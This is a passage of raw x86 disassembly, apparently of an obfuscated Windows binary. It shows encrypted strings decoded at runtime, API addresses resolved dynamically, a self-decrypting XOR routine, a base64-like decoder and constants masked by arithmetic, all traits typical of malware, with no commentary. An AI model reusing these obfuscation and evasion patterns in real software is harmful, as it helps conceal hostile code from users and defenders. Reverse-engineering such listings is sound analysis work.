mov ds:10010090h, eax
push 1001599Fh
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:1000D014h, eax
push 10015993h
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:100109FCh, eax
push 10015987h
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:100137D4h, eax
push 10015975h
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:100105ACh, eax
push 10015963h
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:10013834h, eax
push 10015955h
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:10013838h, eax
push 10015941h
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:1001395Ch, eax
push 10015930h
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:10013814h, eax
push 1001591Ah
call sub_41B08F
add esp, 68h
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:1000DFFCh, eax
pop edi
retn
sub_41B3AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B6BE proc near ; CODE XREF: .data:0041A9FD�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov eax, [ebp+arg_0]
mov esi, [eax+3Ch]
mov ecx, esi
add ecx, eax
mov eax, [ecx+28h]
mov edx, [ebp+arg_0]
lea esi, [eax+edx+0Dh]
movzx eax, byte ptr [esi]
xor eax, 4Dh
mov [ebp+var_1], al
movzx eax, byte ptr [esi+1]
mov edx, ds:100141D0h
add edx, 1F3h
add edx, ds:1001413Ch
mov ebx, eax
imul ebx, edx
mov eax, ds:10014244h
mov ecx, eax
add ecx, ds:100141B4h
sub ecx, 0Bh
jmp short loc_41B71C
; ---------------------------------------------------------------------------
loc_41B70E: ; CODE XREF: sub_41B6BE+60�j
movzx eax, byte ptr [esi+ecx]
movzx edx, [ebp+var_1]
xor eax, edx
mov [esi+ecx], al
inc ecx
loc_41B71C: ; CODE XREF: sub_41B6BE+4E�j
cmp ecx, ebx
jb short loc_41B70E
mov eax, [ebp+arg_4]
mov [eax], ebx
mov eax, esi
pop esi
pop ebx
leave
retn
sub_41B6BE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
movsx eax, word ptr ds:100141F0h
sub eax, 2
cmp ds:10013964h, eax
jbe short loc_41B74B
push 10013964h
call dword ptr ds:1000D010h
loc_41B74B: ; CODE XREF: .data:0041B73E�j
mov eax, ds:10013964h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B754 proc near ; CODE XREF: sub_41F8D9+95�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push edi
mov edi, [ebp+arg_0]
call sub_41B366
or eax, eax
jz short loc_41B78A
push dword ptr ds:10014288h
push 1
push edi
call dword ptr ds:10013848h
mov [ebp+var_4], eax
push dword ptr ds:10014288h
push 4
push edi
call dword ptr ds:10013848h
mov [ebp+var_8], eax
loc_41B78A: ; CODE XREF: sub_41B754+10�j
pop edi
leave
retn
sub_41B754 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B78D proc near ; CODE XREF: sub_422ED8+2�p
; sub_422ED8+9�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push edi
lea eax, [ebp+var_104]
push eax
mov eax, ds:100140C8h
add eax, ds:10014244h
sub eax, 0Bh
push eax
push 0
push [ebp+arg_0]
push 0
call dword ptr ds:10010A00h
mov edi, eax
or edi, edi
jnz short loc_41B7EB
push 10015915h
call sub_41B08F
push eax
lea edi, [ebp+var_104]
push edi
call dword ptr ds:1000D024h
push 1
push 43h
lea eax, [ebp+var_104]
push eax
call sub_41D579
add esp, 18h
loc_41B7EB: ; CODE XREF: sub_41B78D+31�j
pop edi
leave
retn
sub_41B78D endp
; =============== S U B R O U T I N E =======================================
sub_41B7EE proc near ; CODE XREF: .data:0041A7DB�p
push edi
push 10015905h
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10010598h
mov ds:10014278h, eax
test eax, eax
jnz short loc_41B821
push 100158F5h
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10011208h
mov ds:10014278h, eax
loc_41B821: ; CODE XREF: sub_41B7EE+1A�j
push 100158E4h
call sub_41B08F
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:1001059Ch, eax
push 100158D0h
call sub_41B08F
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:1000D044h, eax
push 100158C1h
call sub_41B08F
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:100137E8h, eax
push 100158B1h
call sub_41B08F
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:100105A0h, eax
push 1001589Dh
call sub_41B08F
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:10010080h, eax
push 10015884h
call sub_41B08F
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:1000D01Ch, eax
push 1001586Dh
call sub_41B08F
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:100137F0h, eax
push 10015854h
call sub_41B08F
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:10012810h, eax
push 10015834h
call sub_41B08F
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:1000DFF4h, eax
push 10015817h
call sub_41B08F
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:100111E0h, eax
push 100157F9h
call sub_41B08F
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:100109E8h, eax
push 100157DCh
call sub_41B08F
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:100101A8h, eax
push 100157C6h
call sub_41B08F
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:100109DCh, eax
push 100157ABh
call sub_41B08F
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:1000D048h, eax
push 10015797h
call sub_41B08F
add esp, 3Ch
push eax
push dword ptr ds:10014278h
call dword ptr ds:100101ACh
mov ds:10013848h, eax
pop edi
retn
sub_41B7EE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 10015CC4h
push esi
call dword ptr ds:10013824h
or eax, eax
jz short loc_41B9F6
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41BA3E
; ---------------------------------------------------------------------------
loc_41B9F6: ; CODE XREF: .data:0041B9E4�j
push 10015C34h
push esi
call dword ptr ds:10013824h
or eax, eax
jz short loc_41BA16
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41BA3E
; ---------------------------------------------------------------------------
loc_41BA16: ; CODE XREF: .data:0041BA04�j
push 10015C14h
push esi
call dword ptr ds:10013824h
or eax, eax
jz short loc_41BA36
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41BA3E
; ---------------------------------------------------------------------------
loc_41BA36: ; CODE XREF: .data:0041BA24�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_41BA3E: ; CODE XREF: .data:0041B9F4�j
; .data:0041BA14�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BA45 proc near ; CODE XREF: sub_41C00F+BB�p
; sub_41C00F+110�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov byte ptr [ebx], 0
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41BA5B: ; CODE XREF: sub_41BA45+1B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41BA5B
mov [ebp+var_4], eax
movsx edi, word ptr ds:100140A0h
sub edi, 1
jmp short loc_41BAE1
; ---------------------------------------------------------------------------
loc_41BA71: ; CODE XREF: sub_41BA45+9F�j
movzx eax, [ebp+arg_8]
cmp edi, eax
jb short loc_41BA84
mov al, [esi+edi]
cmp al, 2Fh
jz short loc_41BA84
cmp al, 2Eh
jnz short loc_41BAA3
loc_41BA84: ; CODE XREF: sub_41BA45+32�j
; sub_41BA45+39�j
push 10015791h
call sub_41B08F
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call dword ptr ds:10013810h
add esp, 10h
jmp short loc_41BAD2
; ---------------------------------------------------------------------------
loc_41BAA3: ; CODE XREF: sub_41BA45+3D�j
push 1001578Ch
call sub_41B08F
push eax
push ebx
call dword ptr ds:1000D024h
push 10015784h
call sub_41B08F
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call dword ptr ds:10013810h
add esp, 1Ch
loc_41BAD2: ; CODE XREF: sub_41BA45+5C�j
lea eax, [ebp+var_7]
push eax
push ebx
call dword ptr ds:1000D024h
add esp, 8
inc edi
loc_41BAE1: ; CODE XREF: sub_41BA45+2A�j
cmp edi, [ebp+var_4]
jb short loc_41BA71
pop edi
pop esi
pop ebx
leave
retn
sub_41BA45 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
mov edi, [ebp+0Ch]
mov eax, [ebp+18h]
mov [ebp+18h], ax
movsx eax, word ptr ds:10014220h
movsx edx, word ptr ds:100140B8h
lea eax, [eax+edx+0EAh]
cmp edi, eax
jnz short loc_41BB20
push dword ptr [ebp+1Ch]
call sub_421545
pop ecx
xor eax, eax
jmp short loc_41BB46
; ---------------------------------------------------------------------------
loc_41BB20: ; CODE XREF: .data:0041BB11�j
mov eax, ds:1001415Ch
add eax, 0FBh
add eax, ds:10014158h
cmp edi, eax
jnz short loc_41BB41
push dword ptr [ebp+1Ch]
call sub_41D305
pop ecx
xor eax, eax
jmp short loc_41BB46
; ---------------------------------------------------------------------------
loc_41BB41: ; CODE XREF: .data:0041BB32�j
mov eax, 80020003h
loc_41BB46: ; CODE XREF: .data:0041BB1E�j
; .data:0041BB3F�j
pop edi
pop ebp
retn 24h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB4B proc near ; CODE XREF: .data:0041E861�p
; sub_41EF87+1B8�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
movsx eax, word ptr ds:10014160h
add eax, ds:10014118h
sub eax, 0Ch
mov [ebp+var_8], eax
mov [ebp+var_C], eax
mov esi, eax
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_8]
add eax, ebx
mov [ebp+var_4], eax
mov edi, [ebp+arg_0]
jmp loc_41BC74
; ---------------------------------------------------------------------------
loc_41BB7F: ; CODE XREF: sub_41BB4B+131�j
movsx edx, byte ptr [edi]
shl edx, 2
mov esi, ds:10014384h[edx]
mov eax, ds:100141F8h
sub eax, 5
neg eax
cmp esi, eax
jz loc_41BC73
mov eax, [ebp+var_8]
or eax, eax
jl loc_41BC70
cmp eax, 3
jg loc_41BC70
jmp dword ptr ds:10014784h[eax*4]
; ---------------------------------------------------------------------------
inc [ebp+var_8]
jmp loc_41BC70
; ---------------------------------------------------------------------------
mov edx, [ebp+var_C]
movsx ecx, word ptr ds:100140A0h
add ecx, ds:1001422Ch
sub ecx, 3
mov eax, edx
shl eax, cl
mov [ebp+var_18], eax
mov edx, esi
and edx, 30h
mov ecx, ds:1001417Ch
sub ecx, 5
mov eax, edx
sar eax, cl
mov edx, [ebp+var_18]
or edx, eax
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_41BC70
; ---------------------------------------------------------------------------
mov edx, [ebp+var_C]
and edx, 0Fh
mov ecx, ds:100140DCh
add ecx, 4
mov eax, edx
shl eax, cl
mov [ebp+var_1C], eax
mov edx, esi
and edx, 3Ch
mov ecx, ds:100141E4h
inc ecx
mov eax, edx
sar eax, cl
mov edx, [ebp+var_1C]
or edx, eax
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_41BC70
; ---------------------------------------------------------------------------
mov edx, [ebp+var_C]
and edx, 3
mov ecx, ds:10014218h
add ecx, ds:100141B0h
sub ecx, 0Ah
mov eax, edx
shl eax, cl
mov edx, eax
or edx, esi
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
mov eax, ds:10014124h
sub eax, 2
mov [ebp+var_8], eax
loc_41BC70: ; CODE XREF: sub_41BB4B+58�j
; sub_41BB4B+61�j ...
mov [ebp+var_C], esi
loc_41BC73: ; CODE XREF: sub_41BB4B+4D�j
inc edi
loc_41BC74: ; CODE XREF: sub_41BB4B+2F�j
cmp byte ptr [edi], 0
jz short loc_41BC82
cmp ebx, [ebp+var_4]
jb loc_41BB7F
loc_41BC82: ; CODE XREF: sub_41BB4B+12C�j
cmp byte ptr [edi], 0
jnz short loc_41BC8E
mov eax, ebx
sub eax, [ebp+arg_4]
jmp short loc_41BC9E
; ---------------------------------------------------------------------------
loc_41BC8E: ; CODE XREF: sub_41BB4B+13A�j
mov eax, ds:100140D0h
add eax, ds:100140D8h
sub eax, 5
neg eax
loc_41BC9E: ; CODE XREF: sub_41BB4B+141�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BB4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BCA3 proc near ; CODE XREF: sub_41D305+EC�p
; sub_421545+CC�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
push ebx
call dword ptr ds:1000D000h
mov edi, eax
push 0
push 0
mov eax, ds:100141D0h
add eax, 1FFAh
push eax
push esi
push edi
push ebx
movsx eax, word ptr ds:100141DCh
sub eax, 9
push eax
push 0
call dword ptr ds:1000D00Ch
mov eax, ds:100141CCh
add eax, ds:10014134h
sub eax, 5
mov [esi+edi], al
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41BCA3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov edi, [ebp+8]
push 1000605Fh
push dword ptr fs:0
mov fs:0, esp
push 1001577Ch
call sub_41B08F
push dword ptr [edi]
push eax
lea esi, [ebp-0Ah]
push esi
call dword ptr ds:10013810h
add esp, 10h
loc_41BD2B: ; CODE XREF: .data:0041BD4C�j
push 0
push dword ptr [edi]
lea eax, [ebp-0Ah]
push eax
call sub_41D579
movsx eax, word ptr ds:1001423Ch
sub eax, 5
push eax
call dword ptr ds:1001380Ch
add esp, 10h
jmp short loc_41BD2B
; ---------------------------------------------------------------------------
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BD54 proc near ; CODE XREF: .data:0041AA95�p
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
mov eax, ds:1001422Ch
sub eax, 4
mov [ebp+var_4], eax
jmp short loc_41BD80
; ---------------------------------------------------------------------------
loc_41BD6A: ; CODE XREF: sub_41BD54+40�j
mov eax, 30h
mul [ebp+var_4]
mov [ebp+var_20], eax
and dword ptr ds:10011540h[eax], 0
inc [ebp+var_4]
loc_41BD80: ; CODE XREF: sub_41BD54+14�j
movsx eax, word ptr ds:100140B4h
mov edx, ds:10014208h
lea eax, [eax+edx+5Ah]
cmp [ebp+var_4], eax
jb short loc_41BD6A
push 0
call dword ptr ds:10010084h
push 10014360h
push 10015CB4h
push 7
push 0
push 10015BE4h
call dword ptr ds:100105D4h
mov ebx, eax
mov eax, ds:100141E8h
movsx edx, word ptr ds:1001412Ch
add eax, edx
sub eax, 0Fh
cmp ebx, eax
jnz loc_41BF75
lea eax, [ebp+var_C]
push eax
mov eax, ds:10014360h
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
mov eax, ds:10014224h
movsx edx, word ptr ds:10014190h
add eax, edx
sub eax, 0Ah
cmp ebx, eax
jnz short loc_41BE07
movsx eax, word ptr ds:100140E4h
sub eax, 2
cmp [ebp+var_C], eax
jnz short loc_41BE0C
loc_41BE07: ; CODE XREF: sub_41BD54+A2�j
jmp loc_41BF0B
; ---------------------------------------------------------------------------
loc_41BE0C: ; CODE XREF: sub_41BD54+B1�j
movsx eax, word ptr ds:10014144h
add eax, ds:100140D4h
sub eax, 9
mov [ebp+var_8], eax
jmp loc_41BEFF
; ---------------------------------------------------------------------------
loc_41BE24: ; CODE XREF: sub_41BD54+1B1�j
mov [ebp+var_38], 3
mov eax, [ebp+var_8]
mov [ebp+var_30], eax
lea eax, [ebp+var_3C]
push eax
lea esi, [ebp+var_38]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, ds:10014360h
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, ds:10014188h
sub eax, 9
cmp ebx, eax
jnz loc_41BEFC
lea eax, [ebp+var_40]
push eax
push 10015CD4h
mov eax, [ebp+var_3C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:100141B0h
sub eax, 7
cmp ebx, eax
jnz short loc_41BEF3
lea eax, ds:1001435Ch
mov [ebp+var_24], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_44]
push eax
push 10015C04h
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:100141ECh
add eax, ds:10014168h
sub eax, 0Fh
cmp ebx, eax
jnz short loc_41BEE1
lea eax, [ebp+var_48]
push eax
push 10015C04h
push [ebp+var_44]
push [ebp+var_40]
call sub_424E34
add esp, 10h
mov [ebp+var_4C], eax
mov eax, [ebp+var_44]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41BEE1: ; CODE XREF: sub_41BD54+168�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41BEF3: ; CODE XREF: sub_41BD54+12F�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41BEFC: ; CODE XREF: sub_41BD54+107�j
inc [ebp+var_8]
loc_41BEFF: ; CODE XREF: sub_41BD54+CB�j
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_41BE24
loc_41BF0B: ; CODE XREF: sub_41BD54:loc_41BE07�j
lea eax, ds:10014380h
mov [ebp+var_10], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_14]
push eax
push 10015BF4h
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr ds:0[esi]
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr [esi+8]
lea eax, [ebp+var_1C]
push eax
push 10015BF4h
push [ebp+var_14]
push dword ptr ds:10014360h
call sub_424E34
add esp, 10h
mov [ebp+var_18], eax
mov ecx, ds:100141B4h
sub ecx, 4
cmp eax, ecx
jnz short loc_41BF75
mov eax, ds:10014360h
push eax
mov esi, [eax]
call dword ptr [esi+8]
and dword ptr ds:10014360h, 0
loc_41BF75: ; CODE XREF: sub_41BD54+78�j
; sub_41BD54+20D�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BD54 endp
; ---------------------------------------------------------------------------
mov eax, ds:100140C8h
dec eax
push eax
call dword ptr ds:10013840h
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BF88 proc near ; CODE XREF: sub_41C22E+46D�p
; sub_41C22E+489�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_425D5D
push ebx
push esi
push edi
push 5
push [ebp+arg_0]
call dword ptr ds:1000D004h
mov edi, eax
loc_41BFA5: ; CODE XREF: sub_41BF88+78�j
or edi, edi
jnz short loc_41BFAD
xor eax, eax
jmp short loc_41C002
; ---------------------------------------------------------------------------
loc_41BFAD: ; CODE XREF: sub_41BF88+1F�j
push 0FFFh
lea eax, [ebp+var_FFF]
push eax
push edi
call dword ptr ds:1000EFC0h
push dword ptr ds:100141A4h
push [ebp+arg_4]
lea eax, [ebp+var_FFF]
push eax
call sub_4251A5
add esp, 0Ch
movsx esi, word ptr ds:100140F8h
movsx ebx, word ptr ds:10014160h
lea esi, [esi+ebx+0FFF8h]
cmp eax, esi
jz short loc_41BFF5
mov eax, edi
jmp short loc_41C002
; ---------------------------------------------------------------------------
loc_41BFF5: ; CODE XREF: sub_41BF88+67�j
push 2
push edi
call dword ptr ds:1000D004h
mov edi, eax
jmp short loc_41BFA5
; ---------------------------------------------------------------------------
loc_41C002: ; CODE XREF: sub_41BF88+23�j
; sub_41BF88+6B�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BF88 endp
; ---------------------------------------------------------------------------
mov eax, 80004001h
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C00F proc near ; CODE XREF: sub_41F5AB+AB�p
; sub_423202+1C3�p ...
var_EF38 = dword ptr -0EF38h
var_EF34 = dword ptr -0EF34h
var_EF30 = dword ptr -0EF30h
var_EF2C = byte ptr -0EF2Ch
var_EF2B = byte ptr -0EF2Bh
var_EE2C = dword ptr -0EE2Ch
var_EE24 = byte ptr -0EE24h
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
mov eax, 0EF38h
call sub_425D5D
push ebx
push esi
push edi
mov edi, ds:100140DCh
inc edi
add edi, ds:10014214h
imul edi, 3C0h
mov esi, ds:10014198h
add esi, 0EA57h
add edi, esi
shl edi, 1
mov [ebp+var_EF38], edi
push edi
call sub_425CE2
add esp, 4
mov [ebp+var_EE2C], eax
movzx eax, [ebp+arg_0]
movsx edx, word ptr ds:10014098h
sub edx, 4
cmp eax, edx
jnz short loc_41C08C
push 10015771h
call sub_41B08F
add esp, 4
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10013810h
add esp, 8
jmp loc_41C18C
; ---------------------------------------------------------------------------
loc_41C08C: ; CODE XREF: sub_41C00F+58�j
call dword ptr ds:100111ECh
mov ebx, eax
mov [ebp+var_EF2C], bl
movzx eax, [ebp+arg_0]
movsx edx, word ptr ds:10014190h
sub edx, 3
cmp eax, edx
jnz short loc_41C104
mov eax, ds:10014170h
add eax, ds:10014198h
sub eax, 7
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push [ebp+arg_8]
call sub_41BA45
add esp, 0Ch
push 10015741h
call sub_41B08F
add esp, 4
movzx edi, [ebp+var_EF2C]
push edi
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10013810h
add esp, 10h
jmp loc_41C18C
; ---------------------------------------------------------------------------
loc_41C104: ; CODE XREF: sub_41C00F+9B�j
mov eax, ds:10014118h
sub eax, 6
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push dword ptr ds:1001433Ch
call sub_41BA45
add esp, 0Ch
push 100156DEh
call sub_41B08F
add esp, 4
mov edi, [ebp+arg_18]
mov esi, [ebp+arg_8]
mov ebx, edi
add ebx, esi
push ebx
mov ebx, ds:100141E4h
add ebx, 4
push ebx
push [ebp+arg_1C]
push edi
push [ebp+arg_14]
movzx edi, [ebp+var_EF2C]
push edi
mov edi, esi
sub edi, [ebp+arg_C]
mov esi, ds:100141B0h
sub esi, 3
sub edi, esi
push edi
push 100111F0h
push [ebp+arg_10]
push [ebp+arg_20]
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10013810h
add esp, 34h
loc_41C18C: ; CODE XREF: sub_41C00F+78�j
; sub_41C00F+F0�j
push [ebp+var_EF38]
push [ebp+var_EE2C]
mov eax, ds:100141B4h
movsx edx, word ptr ds:10014160h
add eax, edx
sub eax, 9
neg eax
push eax
lea eax, [ebp+var_EE24]
push eax
movsx eax, word ptr ds:10014220h
add eax, ds:1001418Ch
sub eax, 8
push eax
push 0
call dword ptr ds:1001381Ch
push 100156C4h
call sub_4230FC
add esp, 4
push eax
call dword ptr ds:1000DFF8h
mov [ebp+var_EF30], eax
push [ebp+var_EE2C]
call dword ptr ds:1000DFF8h
mov [ebp+var_EF34], eax
push eax
push [ebp+var_EF30]
mov eax, [ebp+arg_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+104h]
push [ebp+var_EF34]
call dword ptr ds:10013D84h
push [ebp+var_EF30]
call dword ptr ds:10013D84h
lea esp, [ebp-0EF44h]
pop edi
pop esi
pop ebx
leave
retn
sub_41C00F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C22E proc near ; CODE XREF: sub_421545+B5F�p
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C6 = byte ptr -2C6h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_253 = byte ptr -253h
var_23F = byte ptr -23Fh
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_10D = byte ptr -10Dh
var_109 = byte ptr -109h
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_102 = word ptr -102h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
var_FA = byte ptr -0FAh
var_F8 = byte ptr -0F8h
var_F5 = byte ptr -0F5h
var_F4 = byte ptr -0F4h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 324h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz loc_41D23C
mov eax, [ebp+arg_0]
mov al, [eax]
cmp al, 34h
jz short loc_41C255
cmp al, 35h
jnz loc_41D23C
loc_41C255: ; CODE XREF: sub_41C22E+1D�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_41C25D: ; CODE XREF: sub_41C22E+34�j
inc eax
